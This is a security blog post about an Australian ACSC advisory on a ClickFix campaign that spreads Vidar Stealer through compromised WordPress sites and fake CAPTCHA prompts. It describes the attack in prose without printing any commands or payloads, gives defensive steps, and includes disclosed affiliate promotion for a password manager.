10 May 2026 Malware

ClickFix Vidar Stealer: ACSC Warns Australian Businesses of WordPress Infostealer Campaign

Australia's national cyber authority has issued a formal advisory warning businesses and individuals about an active ClickFix campaign using compromised WordPress websites to distribute Vidar Stealer — an infostealer capable of harvesting saved passwords, session cookies, and cryptocurrency wallet details from infected devices. The attack requires no software exploit: it tricks users into running a malicious PowerShell command themselves, bypassing most endpoint defences. Here is what is happening, who is at risk, and what to do.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

What Is the ClickFix Campaign and Why Is Australia Being Targeted?

The Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) issued an advisory in early May 2026 warning that threat actors are actively targeting Australian networks using a social engineering technique known as ClickFix. Unlike most malware campaigns that rely on software vulnerabilities or drive-by downloads, ClickFix weaponises user behaviour — it tricks people into willingly running malicious commands on their own devices.

The advisory, published on cyber.gov.au, confirmed that more than 250 websites have been identified as part of the campaign's infrastructure across at least 12 countries, with Australia explicitly named as a targeted country. Critically, the campaign uses compromised WordPress websites belonging to legitimate Australian businesses as part of its delivery infrastructure. This means Australian site owners face a dual risk: their visitors can be targeted for malware infection, and their websites are being used as stepping stones without the owner's knowledge or consent.

The sectors identified as targets in the ACSC advisory include healthcare, government, hospitality, and education — industries that handle large volumes of sensitive personal and financial data. For Australian small and medium businesses operating in these sectors, the campaign represents a direct and immediate threat rather than an abstract risk.

ClickFix as a technique was first observed in the wild in early 2024, but its weaponisation against Australian infrastructure at scale in 2026 represents a significant escalation. Security researchers at Bleeping Computer, Bitdefender, and the ACSC have all independently corroborated the campaign's active status, making this a well-evidenced threat. The scale of the campaign — spanning more than a dozen countries and hundreds of compromised sites — also indicates this is not an opportunistic one-off but an organised criminal operation with the resources to maintain infrastructure across multiple jurisdictions.

For Australian businesses, the most concerning aspect of the ACSC advisory is the confirmation that Australian WordPress sites are being used as part of the attack chain. A site owner may have no idea their installation has been compromised and is now directing their customers or visitors toward malware delivery. This secondary victimisation carries reputational risk, potential regulatory exposure under the Privacy Act's Notifiable Data Breaches scheme, and the real possibility that visitor credentials are being harvested as a direct result of a website compromise that the owner was unaware of.

How the Attack Works: Fake CAPTCHA to PowerShell Execution

The ClickFix attack chain is deceptively simple, and that simplicity is precisely what makes it effective. A user visits a compromised website — one that appears entirely normal, often belonging to a legitimate Australian business whose WordPress installation has been silently hijacked. Instead of seeing the expected content, the user is presented with a page that mimics a Cloudflare browser verification screen or a CAPTCHA challenge. Both are UI patterns that users have been trained to complete without scrutiny.

The fake prompt instructs the user to "verify they are human" by following a short sequence of steps: press a keyboard shortcut to open the Windows Run dialog or PowerShell prompt, paste a command that the page has already loaded into the clipboard, and press Enter to execute. The command in the clipboard is a malicious PowerShell instruction. Once executed, it silently downloads and installs Vidar Stealer on the victim's device. The entire process takes under a minute and requires no technical knowledge from the victim.

This attack vector is significant because it bypasses many common endpoint protections. Most antivirus tools and email security gateways are designed to intercept malicious files arriving via download or attachment — not to detect the user themselves pasting and executing a command at the prompt. The malicious activity originates from a trusted system process (PowerShell) rather than a suspicious executable, which limits how much behavioural detection can help at the point of execution.

Application whitelisting can block this attack if PowerShell execution is restricted for non-administrator accounts, but this control is absent in the majority of Australian SMB environments. The ACSC advisory specifically recommends implementing guidance to restrict the execution of unauthorised or unapproved applications — language that directly maps to the Essential Eight's Application Control mitigation strategy at Maturity Level 1.

It is also worth noting that the ClickFix technique is not specific to Vidar Stealer. Security researchers have documented its use to distribute other malware families including DarkGate, NetSupport RAT, and Lumma Stealer. The delivery mechanism will outlast the current campaign: once a social engineering template proves effective at this scale, criminal groups adopt and iterate on it. Australian businesses should treat this as a persistent threat class, not a single campaign to wait out.

Inside Vidar Stealer: What the Malware Harvests from Your Device

Vidar Stealer is a mature and continuously developed infostealer malware family, first observed in late 2018 and derived from the Arkei stealer codebase. As of 2026, it remains one of the most actively distributed infostealers, operated as a subscription-based Malware-as-a-Service. This commercial model means any moderately motivated attacker can deploy it without developing the malware themselves — subscriptions reportedly start from around $100 per month on underground forums. That accessibility is part of why the ACSC is seeing it deployed at this scale.

Once executed on a victim's system, Vidar works through a priority list designed to maximise the value extracted from each infection.

Browser credential extraction

Vidar systematically extracts saved usernames and passwords from all major browsers — Chrome, Edge, Firefox, Opera, and Vivaldi. In its updated 2.0 form, Vidar bypasses Chrome's AppBound encryption through direct memory injection, meaning Google's enhanced browser-level protection for saved passwords does not reliably deter it. Every set of credentials saved in a browser's built-in password manager is a viable target. For businesses where staff routinely save work credentials in their browser for convenience, a single infected device can expose the entire portfolio of that employee's account access.

Session cookies and authentication tokens

Beyond static passwords, Vidar harvests live session cookies. These are particularly dangerous because they represent proof of completed authentication — including completed multi-factor authentication challenges. An attacker who obtains a valid session cookie for a banking portal or cloud service can authenticate as the victim without knowing the password or having access to the second factor. This is the same mechanism that has featured in several high-profile Australian breaches in 2026: MFA is bypassed not by breaking the authentication system, but by stealing the credential that proves it was already completed.

Cryptocurrency wallet data

Vidar targets more than 50 cryptocurrency wallet applications, extracting wallet files, private keys, and seed phrases. For Australians who hold crypto assets in software wallets, a Vidar infection is a direct and immediate threat to those holdings. There is no recovery path for a stolen private key or seed phrase.

Evasion: fileless execution after initial drop

A notable operational feature of Vidar is that it deletes its own executable file immediately after launching and continues operating from system memory. This substantially reduces forensic artifacts — many victims would find no trace of the malware on disk if they checked after the fact. The infection's evidence is the data exfiltrated, not files left behind. This behaviour also means that basic file-scanning antivirus products are less likely to detect an active Vidar infection, since the file they would scan is no longer present.

The combination of these capabilities means a single ClickFix interaction — one fake CAPTCHA completed — can hand attackers the keys to a victim's entire online identity: banking, email, cloud services, business systems, and financial assets simultaneously.

What Australian Businesses and Individuals Should Do Now

The ACSC advisory outlines recommended actions, and independent security researchers have expanded on these. Below is a prioritised response for Australian businesses and individuals, ordered by effectiveness against this specific threat.

Check whether your WordPress site has been compromised. If you operate a WordPress website, review recently modified files in your wp-content/themes and wp-content/plugins directories. Check your hosting provider's access logs for unusual traffic patterns, particularly requests to recently added PHP files in unexpected locations. Unexplained injections into theme files are a common indicator of the type of compromise used to deliver ClickFix redirects. If your site is hosted on a managed platform, contact your host directly and ask them to run an integrity scan.

Restrict PowerShell execution for non-administrator accounts. This is the single most direct technical control against ClickFix-style attacks. Windows PowerShell execution policies can be set at user and machine level via Group Policy. For most employees and home users, restricting PowerShell execution to signed scripts or requiring administrator elevation removes ClickFix's primary delivery path. Most SMB users have no legitimate need to run unsigned PowerShell scripts in the course of a normal workday. This control is achievable without specialist tooling and is free to implement on any Windows environment.

Train staff and household members on the ClickFix prompt pattern. ClickFix succeeds because users trust CAPTCHA and browser verification prompts as routine. A single clear message — no legitimate website will ever instruct you to open the Run dialog, paste a command, and press Enter — is sufficient to eliminate that trust for most people. This training takes two minutes and removes the human vulnerability the entire attack chain depends on. For businesses, this should be sent as a direct communication to all staff immediately, given the active campaign status confirmed by the ACSC.

Treat any potentially exposed device as fully compromised. If there is any possibility that a device has been exposed — a staff member completed an unexpected CAPTCHA on an unfamiliar site — treat it as a confirmed Vidar infection. Change passwords for all critical accounts from a different, clean device, prioritising banking, email, cloud services, and business systems. Because Vidar can harvest all saved browser credentials in a single pass, a single compromised device can mean every saved browser credential on that device is in attacker hands.

Move credentials out of the browser. Browser-saved passwords are Vidar's primary target. A dedicated password manager stores credentials in an encrypted vault that is architecturally separate from the browser's credential store, significantly limiting what an infostealer can access through the browser API. NordPass provides an encrypted credential vault with breach-monitoring alerts — if your email address appears in a fresh credential dump, NordPass notifies you so you can act before attackers do. Its zero-knowledge architecture means your master password never leaves your device, and the vault contents are inaccessible even in the event of a server-side breach at NordPass itself. For small businesses looking to reduce their exposure to credential-theft campaigns specifically, moving away from browser-saved passwords is one of the highest-return changes available.

Building a Layered Defence Against Social Engineering at Scale

The ClickFix and Vidar Stealer campaign is not an isolated event. It represents a broader shift in how credential theft operates at the criminal-enterprise level. Security researchers have documented ClickFix being used to distribute at least four separate malware families in 2026: Vidar Stealer, DarkGate, NetSupport RAT, and Lumma Stealer. Multiple independent criminal groups have adopted the technique, and it will continue to appear with new payloads long after the current ACSC-documented campaign is disrupted. The controls below address the structural vulnerabilities ClickFix exploits, not just this specific campaign.

Align with the ACSC Essential Eight. The ACSC's Essential Eight mitigation strategies directly address the attack surfaces ClickFix exploits. Application Control at Maturity Level 1 prevents unapproved executables from running — including unsigned PowerShell payloads. Patching Applications and Patching Operating Systems close the browser-level vulnerabilities that infostealers sometimes chain with social engineering to deepen access. Restricting Administrative Privileges limits what an infostealer can do even if it executes — Vidar running in a standard user context has less access to system-protected credential stores than the same malware running with elevation. These are not aspirational controls; the ACSC designed the Essential Eight specifically for Australian organisations, including SMBs, and provides free guidance on implementation at each maturity level.

Keep WordPress fully patched, including plugins and themes. The ClickFix campaign uses compromised WordPress installations as delivery infrastructure, and the majority of those compromises exploit outdated plugins and themes rather than WordPress core itself. Outdated plugins are the primary initial access vector for WordPress compromise globally. Keeping every installed plugin and theme current — and removing inactive ones entirely — closes the most common entry points. The WordPress.org plugin directory flags plugins that have not been updated in over two years; those should be treated as a security liability regardless of their published vulnerability status.

Monitor PowerShell execution logs. Windows Event Log captures PowerShell activity through Script Block Logging (Event ID 4104). Configuring alerts for PowerShell executions initiated from unusual parent processes — such as the Windows Run dialog — can surface ClickFix activity before exfiltration completes. This is achievable using Windows Event Viewer without a dedicated security platform.

Enforce unique credentials across every account. One of the compounding harms from any infostealer infection is credential reuse. When a single harvested password unlocks multiple accounts, the damage from one infected device multiplies across every service that shares that password. Using NordPass to generate and store unique, high-entropy passwords for every account means that even if Vidar successfully harvests credentials from a session, the attacker gains access to only that single account rather than a master key that unlocks the victim's entire digital life. This is the foundational credential hygiene practice that makes infostealer campaigns significantly less damaging, even when they partially succeed.

The ACSC advisory on ClickFix and Vidar Stealer documents a campaign using Australian infrastructure against Australian users right now. The controls above are achievable for any business this week — most without enterprise-level budget or dedicated security staff. Treating a formal ACSC advisory as a prompt for immediate action is the posture it is designed to encourage.